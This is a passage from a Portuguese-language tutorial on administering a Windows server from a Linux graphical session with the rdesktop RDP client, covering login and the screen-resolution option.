Será exibida a consulta com o pacote já instalado.

Acessando o servidor Microsoft a partir do Linux

Agora sim, vamos conectar no servidor Windows a partir do Linux. É necessário que você esteja acessando o Linux a partir do Modo gráfico.

1. Acesse uma console no Linux

Vamos acessar com a forma padrão inicialmente.

2. Digite rdesktop IP_DO_SERVIDOR.

Será exibida a seguinte tela:

3. No campo User name: informe um usuário com privilégios de acesso e no campo Password: digte a senha.

Aguarde um pouco enquanto é feito o logon. Veja a ilustração:

4. Bem, a gerência do servidor Windows agora é com você.

Mais opções do rdesktop

Informando a resolução:

rdesktop -g 1024x768 IP_DO_Servidor
Esta opção faz com que o servidor seja acessado com a resolução de 1024x768.
Bem, para gerenciar isto é o suficiente.

Conclusão

Aprendemos, de forma simples e objetiva, como gerenciar os servidores Microsoft através do protocolo RDP. O programa rdesktop tem várias opções como mapeamento de impressora, ativação do som, etc. Mas tentamos ser o mais prático e didático.